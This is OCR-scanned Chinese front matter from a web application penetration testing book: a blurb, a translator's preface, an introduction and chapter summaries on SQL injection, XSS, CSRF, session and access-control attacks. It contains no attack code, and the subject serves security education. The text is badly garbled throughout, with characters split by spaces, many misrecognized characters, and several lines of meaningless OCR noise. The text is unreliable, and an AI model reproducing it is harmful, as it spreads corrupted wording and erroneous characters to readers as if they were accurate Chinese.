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本 书 是 探索 和 研究 Web 应 用 程序 安全 漏洞 的 实践 指南 。 作 者 利用 大 
量 的 实际 案例 和 示例 代码 ， 详 细 介 绍 了 各 类 Web 应 用 程序 的 弱点 ， 并 深 
入 阐述 了 如 何 针对 Web 应 用 程序 进行 具体 的 渗透 测试 。 本 书 从 介绍 当前 
Web 应 用 程序 安全 概况 开始 ， 重 点 讨论 渗透 汕 试 时 使 用 的 详细 步骤 和 技 
巧 ， 最 后 总 结 刷 中 涵 瘟 的 主题 。 每 草 后 还 附 有 习题 ， 便 于 谈 者 矶 回 所 学 











第 2 版 新 增 了 Web 应 用 程序 安全 领域 近年 来 的 发 展 变化 新 情况 ， 并 
以 党 试 访问 的 链接 形式 提供 了 几 百 个 互动 式 “ 漏 洞 实验 室 ”， 便 于 读者 迅 
速 掌握 各 种 攻防 知识 与 技能 。 
本 书 适 合 各 层次 计算 机 安全 人 士 和 Web 开 发 与 管理 领域 的 技术 人 员 
阅读 。 
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目 本 书 第 1 版 出 版 以 来 ，Web 安 全 状态 发 生 了 很 大 变化 ， 虽 然 随 着 
人 们 安全 意识 的 提高 ， 一 些 漏洞 已 经 得 到 修复 ， 但 随 着 各 种 新 技术 不 断 
涌现 ， 特 别 是 web 2.0、HTML5、 无 线 互 联网 以 及 云 服务 的 推出 ，Web 
应 用 程序 的 安全 将 面临 更 大 的 挑战 。 为 帮助 用 户 应 对 这 些 挑战 ， 本 书 的 
两 位 作者 对 第 1 版 的 内 容 进行 了 修订 ， 新 增 了 约 30% 的 内 容 ， 主 要 介绍 
Web 安 全 领域 的 新 趋势 及 大 量 新 近 出 现 的 漏洞 。 

从 第 1 版 的 读者 反 啊 来 看 ， 大 多 数 读 者 认为 本 书 内 容 较 深 ， 不 太 适 
合 初 学 者 学 习 。 诚 然 ， 两 位 作者 都 是 web 安 全 领域 的 资深 专家 ， 本 书 更 
是 他 们 多 年 职业 生涯 的 智慧 结晶 。 因 此 ， 建 议 读者 更 多 关注 书 中 介绍 的 
基本 理论 及 作者 考虑 问题 的 角度 ， 而 不 是 具体 的 渗透 测试 方法 。 

应 一 些 读 者 的 要 求 ， 我 们 推出 了 书 中 间 题 答案 的 中 文 版 ， 感 兴趣 的 
读者 可 以 访问 译 者 的 博客 

(http://blog.sina.com.cn/s/blog_545eb7860101379s.html) 或 图 灵 社 区 本 
书页 面 (http://www.ituring.com.cn/book/885) 。 

由 于 本 书 涉及 内 容 非 常 广泛 ， 加 之 译 者 水 平 所 限 ， 书 中 难免 存在 下 
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本 书 是 发 现 并 利用 Web 应 用 程序 安全 漏洞 的 实用 指南 。 这 里 
的 “Web 应 用 程序 ”是 指 通过 使 用 Web 浏 览 器 与 Web 服 务 器 进行 通信 ， 从 
而 加 以 访问 的 应 用 程序 。 本 书 不 仅 分 析 了 大 量 各 种 各 样 的 技术 ， 如 数据 
i ee ee 
情况 。 
如 果 你 想 了 解 如 何 运行 端口 扫描 、 攻 击 防火 墙 或 以 其 他 方式 对 服务 
器 进行 渗透 测试 ， 我 们 建议 你 阅读 其 他 图 书 。 但 是 ， 如 果 你 希望 了 解 渗 
透 测试 员 如 何 攻 击 Web 应 用 程序 、 窍 取 敏感 数据 、 执 行 未 授权 操作 ， 那 
么 本 书 可 以 满足 你 的 需要 。 本 书 将 就 以 上 主题 展开 全 面 而 翔实 的 讨论 。 








本 书 概 述 


本 书 极 其 注重 实用 性 。 虽 然 我 们 提供 了 足够 的 背景 信息 与 理论 知 
识 ， 以 帮助 读者 了 解 Web 应 用 程序 中 包含 的 漏洞 ; 但 是 ， 渗 透 测 试 员 在 
攻击 Web 应 用 程序 时 所 需要 实施 的 步骤 及 采用 的 技巧 ， 才 是 我 们 讨论 的 
重点 所 在 。 本 书 详细 阐述 了 探查 每 一 种 漏洞 所 需 采 用 的 特定 步骤 ， 以 及 
如 何 利 用 它 执行 未 授权 操作 。 我 们 还 根据 多 年 的 工作 经 验 ， 列 出 大 量 实 
例 ， 说 明 在 当今 Web 应 用 程序 中 存在 的 各 种 安全 漏洞 。 

另 一 方面 ， 安 全 意识 就 像 一 把 双 刃 剑 。 开 及 者 能 够 从 了 解 攻击 者 所 
使 用 的 方法 中 受益 ; 相反， 黑客 也 可 以 通过 了 解 应 用 程序 的 防御 机 制 而 
蜂 探 它 的 受 攻击 面 。 除 介绍 安全 漏洞 与 攻击 技巧 外 ， 我 们 还 将 详细 介绍 
应 用 程序 为 抵御 攻击 者 而 采取 的 应 对 措施 。 同 时 ，Web 应 用 程序 渗透 测 
试 员 还 可 以 从 本 书 中 获得 大 量 实用 的 建议 ， 以 帮助 应 用 程序 所 有 者 强化 
他 们 的 应 用 程序 。 

















本 书目 标 读者 


本 书 的 目标 读者 是 Web 应 用 程序 渗透 测试 员 ， 以 及 负责 开发 和 管理 
Web 应 用 程序 的 人 ， 因 为 了 解 你 的 敌人 有 助 于 对 他 们 进行 有 效 防 御 。 

我 们 希望 读者 熟悉 核心 安全 概念 ， 如 登录 和 访问 控制 ， 并 希望 读者 
掌握 基本 的 核心 Web 技 术 ， 如 浏览 器 、 Web 服 务 器 和 HTTP。 通 过 阅读 
本 书 提供 的 解释 说 明 或 其 他 参考 资料 ， 可 以 迅速 弥补 当前 读者 在 这 些 领 
域 的 知识 欠缺 。 

在 介绍 各 种 安全 漏洞 的 过 程 中 ， 我 们 将 提供 代码 片断 ， 说 明 应 用 程 
序 为 何 易 受 攻击 。 这 些 示例 都 非常 简单 ， 不 需要 事先 了 解 编写 代码 的 语 
但 是 ， 有 具备 阅读 或 编写 代码 的 基础 知识 就 再 好 不 过 











本 书 结构 


忆 体 而 言 ， 本 书 根 据 不 同 主题 之 间 的 依赖 关系 将 内 容 组 织 在 一 起 。 
如 果 你 还 不 了 解 黑客 是 如 何 攻 击 Web 应 用 程序 的 ， 应 该 从 头 至 尾 读 完 本 
书 ， 以 了 解 在 后 续 有 关 章 节 中 需要 用 到 的 背景 信息 和 技巧 。 如 果 你 在 这 
方面 已 经 拥有 一 定 的 经 验 ， 可 以 直接 跳 到 特别 感 兴趣 的 任何 章节 或 部 
人 
欠缺。 

本 书 前 3 章 介 绍 一 些 背 景 信 息 ， 描 述 当前 Web 应 用 程序 的 安全 状 
况 ， 说 明 它 将 来 的 发 展 趋势 。 然 后 将 介绍 影响 Web 应 用 程序 的 核心 安全 
问题 ， 以 及 应 用 程序 为 解决 这 些 问题 所 采取 的 防御 机 制 。 同 时 还 将 介绍 
当前 Web 应 用 程序 所 使 用 的 关键 技术 。 

本 书 的 主要 部 分 重点 讨论 核心 主题 一 一 渗透 测试 员 在 攻击 Web 应 用 
程序 时 使 用 的 技巧 。 我 们 根据 实施 全 面 攻 击 所 需要 完成 的 关键 任 务 组 织 
材料 ， 这 些 任务 依次 为 : 解析 应 用 程序 的 功能 ， 检 查 和 攻击 它 的 核心 防 
御 机 制 ， 探 查 特 殊 类 型 的 安全 漏洞 。 

最 后 3 章 对 本 书 涵 广 的 各 种 主题 进行 简要 总 结 : 描述 如 何在 应 用 程 
序 源 代码 中 查找 漏洞 ， 回 顾 能 够 帮助 渗透 测试 员 攻 击 Web 应 用 程序 的 工 
As 详细 介绍 攻击 方法 论 ， 说 明 渗 透 测试 员 如 何 对 一 个 目标 应 用 程序 实 
施 全 面 而 深入 的 攻击 。 

第 1 章 描 述 当前 在 因特网 上 运行 的 Web 应 用 程序 的 安全 状况 。 尽 管 
软件 商 和 常常 保证 Web 应 用 程序 是 安全 的 ， 但 绝 大 多 数 的 应 用 程序 并 不 真 
正安 全 ， 只 要 掌握 一 些 技巧 ， 就 能 够 攻破 它们 。Web 应 用 程序 中 的 漏洞 
源 于 一 个 核心 问题 : 用 户 可 提交 任意 输入 。 这 一 章 将 分 析 造 成 当今 应 用 
程序 安全 状况 不 佳 的 关键 因素 ， 并 说 明 Web 应 用 程序 中 存在 的 缺陷 如 何 
导致 组 织 庞大 的 技术 基础 架构 非常 易于 受到 攻击 。 

第 2 章 描述 Web 应 用 程序 为 解决 “所 有 用 户 输入 都 不 可 信 ? 这 个 基本 
问题 而 采用 的 核心 安全 机 制 。 应 用 程序 通过 这 些 机 制 管理 用 户 访问 、 控 
制 用 户 输入 、 抵 御 攻 击 者 。 这 些 机 制 还 为 管理 员 提 供 各 种 功能 ， 玫 助 他 
们 管理 和 监控 应 用 程序 上 自身。 应 用 程序 的 核心 安全 机 制 还 是 它 的 主要 受 
ee 

原理 。 

第 3 章 简要 介绍 渗透 测试 员 在 攻击 Web 应 用 程序 时 可 能 遇 到 的 关键 
技术 ， 包 括 相 关 HTTP 协 议 、 客 户 端 与 服务 器 端 冲 用 的 技术 以 及 各 种 数 
据 编 码 方案 。 已 经 熟悉 主要 Web 技 术 的 读者 可 以 跳 过 本 章 。 















































第 4 章 描 述 渗透 测试 员 在 攻击 一 个 新 的 应 用 程序 时 所 需 采 取 的 第 一 
步 ， 即 尽 可 能 多 地 收集 与 应 用 程序 有 关 的 信息 ， 以 确定 它 的 受 攻击 面 ， 
制订 攻击 计划 。 渗 透 测试 员 需 要 搜索 并 探查 应 用 程序 ， 枚 举 它 的 全 部 内 
容 与 功能 ， 确 定 所 有 用 户 输入 进入 点 并 查 明 它 所 使 用 的 技术 。 

第 5 章 描述 了 存在 漏洞 的 第 一 个 区 域 。 如 果 一 个 应 用 程序 依靠 在 客 
户 端 实 现 的 控件 来 保护 它 的 安全 ， 就 可 能 造成 这 种 漏洞 。 这 种 保护 应 用 
程序 的 方法 往往 存在 缺陷 ， 因 为 攻击 者 可 轻易 避 开 任何 客户 端 控件 。 应 
用 程序 易于 受到 攻击 的 原因 有 两 个 (1) 通过 客户 端 传送 数据 ， 认 为 
这 些 数 据 不 会 被 修改 ; O) 依赖 客户 端 对 用 户 输入 进行 检查 。 这 一 章 
将 介绍 一 系列 有 用 的 技术 ， 包 括 HIML、HTTP 与 JavaScript 所 采用 的 轻 
量 级 控件 ， 以 及 使 用 Java applet、ActiveX 控 件 、Silverlight 和 Flash 对 象 
的 重量 级 控件 。 

第 6 一 8 章 将 主要 介绍 Web 应 用 程序 中 最 重要 的 防御 机 制 一 fh oe Ps 
制 用 户 访问 的 机 制 。 第 6 章 描 述 应 用 程序 确认 用 户 身 份 的 各 种 功能 ， 包 
括 主 登 录 功 能 和 更 加 外 围 的 与 验证 有 关 的 功能 ， 如 用 户 注册 、 密 码 修改 
和 账户 恢复 功能 。 验 证 机 制 在 设计 和 执行 方面 都 包含 大 量 漏 洞 ， 攻 击 者 
能 够 利用 它们 获得 未 授权 访问 。 这 些 漏洞 包括 明显 的 缺陷 ， 如 保密 性 不 
强 的 密码 和 易于 受到 弯 力 攻击 ， 以 及 验证 逻辑 中 存在 的 更 微妙 的 问题 。 
这 一 章 还 将 详细 分 析 许 多 安全 性 至 关 重 要 的 应 用 程序 所 采用 的 多 阶段 登 
录 机 制 ， 并 描述 这 些 机 制 中 频繁 出 现 的 新 型 漏洞 。 

第 7 章 介 绍 会 话 管理 机 制 。 大 多 数 应 用 程序 通过 有 状态 会 话 这 个 概 
念 补充 无 状态 的 HTTP 协 议 ， 帮 助 它 们 在 不 同 的 请 求 中 确定 每 个 用 户 的 
身份 。 当 Web 应 用 程序 受 攻击 时 ， 这 个 机 制 是 一 个 主要 的 攻击 目标 ， 因 
为 如 果 能 够 攻破 它 ， 就 能 够 有 效 避 开 登 录 机 制 ， 伪 装 成 其 他 用 户 ， 而 不 
必 知 道 他 们 的 证 书 。 这 一 章 还 将 分 析 生 成 和 传送 会 话 令 牌 过 程 中 存在 的 
各 种 常见 漏洞 ， 并 描述 发 现 和 利用 这 些 漏洞 所 需 采 取 的 步骤 。 

第 8 章 说 明 应 用 程序 如 何 实施 访问 控制 。 应 用 程序 主要 依靠 验证 与 
会 话 管理 机 制 来 完成 这 项 任务 。 本 章 将 介绍 各 种 破坏 访问 控制 的 技巧 ， 
以 及 探查 和 利用 这 些 弱点 的 方法 。 

第 9 章 和 第 10 章 介绍 大 量 相 关 漏 洞 。 如 果 应 用 程序 以 不 安全 的 方式 
在 解释 型 代码 中 插入 用 户 输入 ， 就 会 造成 这 些 漏洞 。 第 9 章 首 先 详细 介 
绍 SQL 注 入 漏洞 ， 讨 论 各 种 攻击 方法 ， 从 最 明显 、 最 简单 的 方法 到 一 系 
列 高 级 攻击 技巧 〈 如 带 外 通道 、 推 晰 和 时 间 延 迟 ) 。 对 于 每 一 种 漏洞 和 
攻击 技巧 ， 我 们 将 描述 3 种 常用 数据 库 (MS-SQL、Oracle 和 MySQL) 之 
间 的 相关 差异 ， 然 后 介绍 一 系列 针对 其 他 数据 存储 (包括 NoSQL、 
XPath 和 LDAP) 的 类 似 攻击 。 

第 10 章 介绍 几 种 其 他 类 型 的 注入 漏洞 ， 包 括 注 入 操作 系统 命令 ， 注 






































AWe ES, SCR mB, SCR aL el, YEAXML, 
SOAP、 后 端 HTTP 请 求 和 电子 邮件 服务 。 

第 11 章 将 介绍 应 用 程序 受 攻击 面 的 一 个 重要 的 、 常 被 人 们 忽略 的 区 
域 一 一 实现 其 功能 的 内 部 逻辑 。 应 用 程序 逻辑 中 的 漏洞 各 不 相同 ， 它 们 
比 SQL 注 入 与 路 站 点 脚本 之 类 的 第 见 漏洞 更 难以 辨别 。 为 此 ， 我 们 将 列 
举 一 系 列 实 例 ， 其 中 存在 的 逻辑 缺陷 导致 应 用 程序 易于 受到 攻击 ， 借 此 
说 明 应 用 程序 设计 者 与 开发 者 所 做 出 的 各 种 错误 假设 。 根 据 这 些 各 不 相 
rate a tee On ean 
REA o 

第 12 章 和 第 13 章 介绍 一 类 广泛 存在 且 广 受 关 注 的 相关 漏洞 ， 即 应 用 
程序 的 恶意 用 户 利用 Web 应 用 程序 中 的 缺陷 攻击 其 他 用 户 ， 并 以 各 种 方 
式 攻 破 这 些 用 户 。 第 12 章 介绍 这 中 最 主要 的 漏洞 一 一 种 影响 因特网 上 
的 绝 大 多 数 Web 应 用 程序 的 广泛 存在 的 漏洞 。 我 们 将 详细 分 析 各 种 类 型 
as 并 介绍 检测 和 利用 即使 是 最 难以 察觉 的 XSS 漏 洞 的 有 效 方 
法 。 

第 13 章 介绍 针对 其 他 用 户 的 几 种 其 他 类 型 的 攻击 ， 包 括 通 过 请 求 伪 
造 和 UI 伪装 诱 使 用 户 执 行 操作 、 使 用 各 种 客户 端 技术 跨 域 获取 数据 、 各 
种 针对 同 源 策 略 的 攻击 、HTITP 消 息 头 注入 、cookie 注 入 和 会 话 固 定 、 开 
放 式 重 定向 、 客 户 端 SQL 注入 、 本 地 隐私 攻击 以 及 利用 ActiveX 控 件 中 
的 漏洞 。 最 后 ， 我 们 将 讨论 一 系列 不 依赖 任何 特定 web 应 用 程序 中 的 漏 
洞 、 但 可 以 通过 任何 恶意 Web 站 点 或 处 于 适当 位 置 的 攻击 者 实施 的 针对 
用 户 的 攻击 。 

第 14 章 并 不 介绍 任何 新 的 漏洞 ， 而 是 描述 一 种 渗透 测试 员 攻 击 wWeb 
应 用 程序 时 需要 掌握 的 技巧 。 由 于 每 种 应 用 程序 都 各 不 相同 ， 大 多 数 攻 
击 都 经 过 某 种 方式 的 定制 《或 自 定 义 ) ， 以 针对 应 用 程序 的 特殊 行为 ， 
以 及 发 现 对 攻击 有 利 的 操纵 方法 。 这 些 攻击 还 要 求 提 出 大 量 相 似 的 请 
求 ， 并 监控 应 用 程序 的 啊 应 。 手 动 执行 这 些 请 求 非常 费力 ， 而 且 容 易 出 
错 。 要 成 为 真正 熟练 的 Web 应 用 程序 黑客 ， 必 须 尽 可 能 自动 实施 攻击 步 
又 ， 使 定制 攻击 更 加 简单 、 快 捷 而 高 效 。 本 章 将 详细 描述 一 种 行 之 有 效 
的 方法 ， 以 完成 这 项 任务 。 我 们 还 将 讨论 在 使 用 自动 化 技巧 时 过 到 的 各 
种 障碍 ， 包 括 防 御 性 的 会 话 处 理 机 制 和 CAPTCHA 控 件 。 此 外 ， 我 们 还 
将 介绍 可 用 于 克服 这 些 障碍 的 工具 和 技巧 。 

第 15 章 分 析 应 用 程序 如 何在 遭受 攻击 时 泄露 信息 。 当 实施 本 书 描述 
的 其 他 各 种 攻击 时 ， 渗 透 测 试 员 应 该 始终 监控 应 用 程序 ， 以 确定 其 他 可 
供 利 用 的 信息 泄露 来 源 。 我 们 将 介绍 如 何 分 析 应 用 程序 的 反常 行为 与 错 
误 消 息 ， 以 深入 了 解 应 用 程序 的 内 部 工作 机 制 ， 并 细 化 攻击 。 我 们 还 将 
介绍 如 何 利用 存在 缺陷 的 错误 处 理 机 制 ， 从 应 用 程序 中 获取 敏感 信息 。 









































第 16 章 介绍 在 以 C 和 C++ 等 本 地 代码 语言 编写 的 应 用 程序 中 存在 的 
一 些 重 要 漏洞 。 这 些 漏洞 包括 缓冲 区 液 出 、 整 数 漏洞 和 格式 化 字符 串 漏 
洞 。 这 个 主题 涉及 的 内 容 非常 广泛 ， 我 们 将 重点 讨论 如 何在 Web 应 用 程 
序 中 探查 这 些 漏洞 ， 并 分 析 一 些 实 例 ， 了 解 造成 这 些 漏洞 的 原因 ， 以 及 
如 何 对 它们 加 以 利用 。 

第 17 章 介绍 一 个 常 被 忽略 的 Web 应 用 程序 安全 领域 。 许 多 应 用 程序 
采用 一 种 分 层 架 构 ， 无 法 恰当 地 隔离 这 些 层面 可 能 会 导致 应 用 程序 易于 
受到 攻击 ， 导 致 攻击 者 能 够 利用 在 其 中 一 个 组 件 中 发 现 的 漏洞 迅速 攻破 
整个 应 用 程序 。 共 享 托管 环境 带 来 另外 一 些 严 重 的 威胁 ， 有 时 ， 攻 击 者 
可 以 利用 一 个 应 用 程序 中 存在 的 缺陷 或 恶意 代码 攻破 整个 环境 及 其 中 运 
行 的 其 他 应 用 程序 。 本 章 还 会 介绍 一 种 众所周知 的 共享 托管 环境 “ 云 计 
算 ” 中 出 现 的 各 种 威胁 。 

第 18 章 描述 各 种 攻击 技巧 ， 说 明 如 何 通 过 攻击 Web 服 务 器 进而 攻击 
其 中 运行 的 Web 应 用 程序 。Web 服 务 器 中 存在 的 漏洞 主要 包括 服务 器 配 
置 方面 的 漏洞 以 及 Web 服 务 器 软件 中 的 安全 漏洞 。 这 个 主题 属于 本 书 的 
讨论 范围 ， 因 为 严格 来 讲 ，Web 服 务 堪 是 技术 栈 的 另 一 个 组 件 。 但 是 ， 
大 多 数 Web 服 务 器 都 与 在 它们 之 中 运行 的 Web 应 用 程序 关系 密切 。 因 
此 ， 本 书 介 绍 针 对 Web 服 务 器 的 攻击 ， 因 为 攻击 者 常常 可 以 利用 它们 直 
接 攻 破 一 个 应 用 程序 ， 而 不 是 首先 间接 攻破 基础 主机 ， 然 后 再 攻击 Web 
应 用 程序 。 

第 19 章 描述 另外 一 种 查找 安全 漏洞 的 方法 。 这 种 方法 与 本 书 其 他 章 
节 讨 论 的 方法 截然 不 同 。 许 多 时 候 ， 我 们 都 可 以 对 应 用 程序 的 源 代码 进 
行 审查 ， 并 且 不 必得 到 应 用 程序 所 有 者 的 协助 。 通 常 ， 审 查 应 用 程序 的 
源 代码 可 以 迅速 确定 一 些 漏洞 ， 但 在 运行 的 应 用 程序 中 探查 这 些 漏洞 可 
能 极其 困难 ， 或 者 需要 耗费 许多 时 间 。 我 们 将 介绍 一 种 代码 审查 方法 ， 
并 简要 说 明 如 何 对 以 各 种 语言 编写 的 代码 进行 审查 ， 以 帮助 读者 在 编程 
经 验 不 足 的 情况 下 进行 有 效 的 代码 审查 。 

第 20 章 详细 介绍 本 书 描述 的 各 种 工具 。 笔 者 在 攻击 真实 的 Web 应 用 
程序 时 使 用 的 就 是 这 些 工 具 。 我 们 将 分 析 这 些 工 具 的 主要 功能 ， 并 详细 
描述 充分 运用 这 些 工具 的 工作 流 类 型 。 另 外 ， 讨 论 一 些 全 自动 工具 能 否 
有 效 地 发 现 Web 应 用 程序 中 存在 的 漏洞 ， 并 提供 一 些 提 示 和 建议 ， 说 明 
如 何 充分 利用 工具 包 。 

第 21 章 综合 介绍 本 书 描述 的 所 有 攻击 步骤 与 技巧 。 我 们 将 根据 渗透 
测试 员 在 实施 攻击 时 所 需 完成 的 任务 之 间 的 逻辑 依赖 关系 来 组 织 这 些 步 
又 与 技巧 ， 并 对 它们 进行 排序 。 如 果 你 已 经 阅读 并 理解 书 中 描述 的 各 种 
漏洞 和 攻击 技巧 ， 就 可 以 把 这 个 方法 当 作 一 个 完整 的 清单 和 工作 计划 ， 
对 Web 应 用 程序 实施 渗透 测试 。 



































新 增 内 容 简 介 


第 1 版 出 版 4 年 以 来 ， 许 多 事情 发 生 了 改变 ， 而 许多 事情 仍 保 持原 
状 。 当 然 ， 新 技术 继续 高 速 发 展 ， 这 引发 了 各 种 新 型 漏洞 和 攻击 。 同 
时 ， 黑 客 们 还 开发 出 了 新 的 攻击 技术 ， 设 计 了 利用 旧 有 漏洞 的 新 方法 。 
但 是 ， 这 些 技术 或 人 为 因素 都 不 可 能 引发 革命 。 今 天 应 用 程序 采用 的 技 
术 早 在 许多 年 前 就 已 经 确立 ， 现 今 的 先进 攻击 技术 所 缠 涵 的 基本 概念 也 
早 在 高 效应 用 这 些 技术 的 许多 研究 人 员 出 生 之 前 束 已 经 成 形 。Web 应 用 
程序 安全 是 一 个 动态 且 充 满 活 力 的 研究 领域 ， 但 多 年 来 ， 人 类 积累 的 智 
ea ene tee et rere ent 

第 2 版 并 不 是 对 第 1 版 的 彻底 改写 ， 第 1 版 的 大 部 分 内 容 ， 现 在 仍然 
适用 。 第 2 版 约 30% 的 内 容 为 新 增 内 容 或 改动 很 大 ， 剩 余 70% 的 内 容 仅 有 
小 幅 改 动 或 未 作 任 何 修 改 。 如 采 读 者 购买 了 本 书 ， 但 对 这 些 改动 感到 失 
望 ， 请 不 要 放弃 。 如 果 你 已 经 掌握 了 第 1 版 中 介绍 的 所 有 技巧 ， 说 明 你 
己 经 学 会 所 需 的 绝 大 部 分 技能 和 知识 。 这 样 的 话 ， 你 就 可 以 集中 精力 学 
T E ee 
情况 。 

第 2 版 的 一 个 显著 特点 是 ， 在 整 本 书 中 提供 了 所 介绍 的 几乎 所 有 漏 
洞 的 真实 示例 。 读 者 可 以 使 用 “尝试 访问 ”链接 以 交互 方式 在 线 运 行书 中 
讨论 的 示例 ， 以 确认 可 以 发 现 并 利用 其 中 包含 的 漏洞 。 书 中 提供 了 几 百 
个 “示例 实验 室 *"， 读 者 可 以 根据 自己 阅读 本 书 的 进度 逐个 访问 这 些 “ 实 
验 室 ”。 访 问 这 些 在 线 “ 实 验 室 ” 需 要 文 付 一 定 的 订阅 费用 ， 这 些 费用 主 
要 用 于 管理 和 维护 相关 基础 设施 。 

如 果 读 者 希望 集中 精力 学 习 第 2 版 中 的 新 增 内 容 ， 以 下 是 对 新 增 或 
改写 内 容 的 汇总 。 

第 1 章 仅 部 分 内 容 有 所 改动 ， 将 介绍 Web 应 用 程序 的 新 应 用 、 技 术 
领域 的 一 些 显 著 趋 势 ， 以 及 组 织 的 典型 安全 边界 将 如 何 继续 发 展 变 化 。 

第 2 章 仪 有 小 幅 改 动 ， 新 增 内 容 将 介绍 几 个 用 于 避 开 输入 确认 防御 
的 常规 技巧 示例 。 

第 3 章 增加 了 几 节 新 内 容 ， 主 要 介绍 各 种 新 技术 及 已 在 第 1 版 中 简要 
介绍 的 技术 。 新 增 的 主题 包括 REST、Ruby on Rails、SQL、XML、Web 
服务 、CSS、VBScript、 文 档 对 象 模型 、Ajax、JSON、 同 源 策略 和 
HTML5。 

第 4 章 仅 有 少量 更 新 ， 以 反映 用 于 解析 内 容 和 功能 的 技术 的 发 展 趋 


















































势 。 

第 5 章 进 行 了 大 幅 改动 。 有 具体 来 说 ， 基 本 上 重新 编写 了 有 关 浏 览 器 
扩展 技术 的 几 节 内 容 ， 详 细 介绍 了 反 编 译 和 调试 字 节 码 的 常规 方法 、 如 
何 处 理 常 规格 式 的 序列 化 数据 ， 以 及 如 何 处 理 渗透 测试 过 程 中 过 到 的 常 
见 问 题 ， 包 括 不 支持 代理 的 客户 端 和 SSL 问 题 。 本 章 还 将 介绍 Silverlight 


第 6 章 内 容 与 现今 情况 保持 一 致 ， 仅 有 小 幅 改 动 。 

第 7 章 新 增 内 容 主要 介绍 自动 测试 令 牌 随机 性 的 新 工具 。 本 章 还 包 
含有 关 攻 击 加 密令 牌 的 新 内 容 ， 包 括 如 何在 不 了 解 所 使 用 的 加 密 算法 或 
加 密 密 钥 的 情况 下 算 改 令 牌 的 实用 技巧 。 

第 8 章 将 介绍 一 些 访问 控制 漏洞 ， 包 括 由 直接 访问 服务 器 端 方法 以 
及 平台 配置 不 当 (将 基于 HTTP 的 方法 用 于 执行 访问 控制 ) 导致 的 漏 
洞 。 本 章 还 将 介绍 一 些 新 工具 和 技巧 ， 可 在 一 定 程 度 上 上 自动 完成 测试 访 
问 控制 的 繁琐 任务 。 

第 9 章 和 第 10 章 的 内 容 经 过 重组 ， 因 而 变 得 更 易于 管理 ， 其 章节 安 
排 也 更 符合 逻辑 。 第 9 章 主要 介绍 针对 其 他 数据 存储 技术 的 SQL 注入 和 
其 他 类 似 攻击 。 由 于 SQL 注入 漏洞 已 广为人知 ， 并 且 在 很 大 程度 上 得 到 
了 解决 ， 因 此 ， 本 章 将 着 重 介绍 现在 仍然 可 以 发 现 SQL 注 入 漏洞 的 实际 
情形 。 本 章 的 其 他 内 容 也 有 小 幅 改 动 ， 将 介绍 当前 的 技术 和 攻击 方法 。 
同时 ， 本 章 还 新 增 了 一 节 内 容 ， 用 于 说 明 如 何 使 用 自动 化 工具 来 利用 
SQL 注入 漏洞 。 有 关 LDAP 注 入 的 内 容 经 过 大 幅 改 动 ， 以 更 详细 地 介绍 
特定 技术 (Microsoft Active Directory 和 OpenLDAP〉， 以 及 利用 常见 漏 
洞 的 新 技巧 。 此 外 ， 本 章 还 将 介绍 针对 NoSQL 的 攻击 。 

第 10 章 讨论 以 前 在 第 1 版 第 9 章 中 介绍 的 其 他 类 型 的 服务 器 端 注 入 漏 
洞 。 新 增 内 容 主 要 介绍 XML 外 部 实体 注入 和 注入 后 端 HITP 请 求 ， 包 括 
HTTP 参 数 注入 /污染 和 注入 URL 改 写 方案 。 

第 11 间 将 提供 更 多 常见 输入 确认 功能 逻辑 缺陷 的 示例 。 由 于 越 来 越 
多 的 应 用 程序 采用 加 密 来 保护 静态 数据 ， 本 章 还 将 介绍 如 何 确定 并 利用 
加 密 提 示 来 解密 加 密 数据 的 示例 。 

第 1 版 的 第 12 章 主要 介绍 针对 其 他 应 用 程序 用 户 的 攻击 。 第 2 版 将 这 
一 章 内 容 放 到 了 两 章 中 ， 因 为 这 些 内 容 过 于 繁杂 ， 不 易 管 理 。 第 12 章 主 
要 讨论 XSS， 相 关内 容 经 过 大 幅 改 动 。 有 关 如 何 避 开 防 御 过 滤 以 插入 脚 
本 代码 的 内 容 已 完全 重 写 ， 主 要 介绍 一 些 新 技术 和 新 技巧 ， 包 括 在 当前 
浏览 器 中 执行 脚本 代码 的 各 种 鲜 为 人 知 的 方法 。 同 时 ， 本 章 还 将 更 详细 
地 介绍 如 何 对 脚本 代码 进行 模糊 处 理 ， 以 避 开 常用 的 输入 过 滤 的 方法 。 
本 章 还 将 介绍 一 些 现实 中 新 出 现 的 XSS 攻 击 示 例 。 新 增 一 节 内 容 介 绍 了 
如 何在 充满 挑战 的 情况 下 实施 有 效 的 XSS 攻 击 ， 涵 盖 如 何 将 攻击 扩散 到 









































所 有 应 用 程序 页 面 、 如 何 通过 cookie 和 Referer 消 息 头 利用 XSS， 以 及 如 
何在 XML 等 非 标 准 请 求 和 响应 内 容 中 利用 XSS。 此 外 ， 本 章 还 将 分 析 浏 
览 器 的 内 置 XSS 过 滤器 ， 以 及 如 何 避 开 这 些 过 滤器 来 实施 攻击 。 新 增 几 
节 还 将 讨论 在 Web 邮 件 应 用 程序 和 上 传 文件 中 利用 XSS 的 特定 技巧 。 本 
章 最 后 介绍 可 用 于 阻止 XSS 攻 击 的 各 种 新 的 防御 措施 。 

第 13 章 为 新 增 的 一 章 ， 介 绍 “ 攻 击 用 户 ” 这 一 涉及 广泛 的 主题 的 其 他 
内 容 。 有 关 跨 站 点 请 求 伪造 的 主题 经 过 更 新 ， 将 介绍 针对 登录 功能 的 攻 
击 、 反 CSRF 防 御 中 的 常见 缺陷 、UI 伪 装 攻 击 ， 以 及 破坏 框架 防御 中 的 
常见 缺陷 。 跨 域 捕获 数据 一 节 〈13.2 节 ) 将 介绍 如 何 通过 注入 包含 非 脚 
本 HIML 和 CSS 的 文本 来 窃取 数据 的 技巧 ， 以 及 各 种 使 用 JavaScript 和 
E4X 跨 域 捕 获 数据 的 技巧 。 新 增 一 节 更 详细 地 介绍 同 源 策 略 ， 包 括 其 在 
不 同 浏览 器 扩展 技术 中 的 实施 情况 、HTML5 带 来 的 改变 ， 以 及 通过 代 
理 服务 应 用 程序 跨 域 操作 的 方法 。 另 设 新 增 节 介绍 客户 端 cookie 注 入 、 
SQL 注 入 和 HTTP 请 求 污染 。 有 关 客 户 病 隐私 攻击 的 内 容 经 过 扩充 ,将 
介绍 浏览 器 扩展 技术 和 HTML5 提 供 的 存储 机 制 。 最 后 ， 男 一 个 新 增 节 
将 集中 介绍 不 依赖 任何 特殊 应 用 程序 中 的 漏洞 、 针 对 Web 用 户 的 攻击 。 
这 些 攻击 可 以 由 任何 恶意 或 已 被 攻破 的 Web 站 点 ， 或 位 于 网 络 中 的 适当 
位 置 的 攻击 者 实施 。 

第 14 章 新 增 部 分 内 容 介绍 自 动 化 攻击 过 程 中 遇 到 的 常见 障碍 ， 以 及 
如 何 克 服 这 些 障碍 。 许 多 应 用 程序 采用 防御 性 的 会 话 处 理 机 制 来 终止 会 
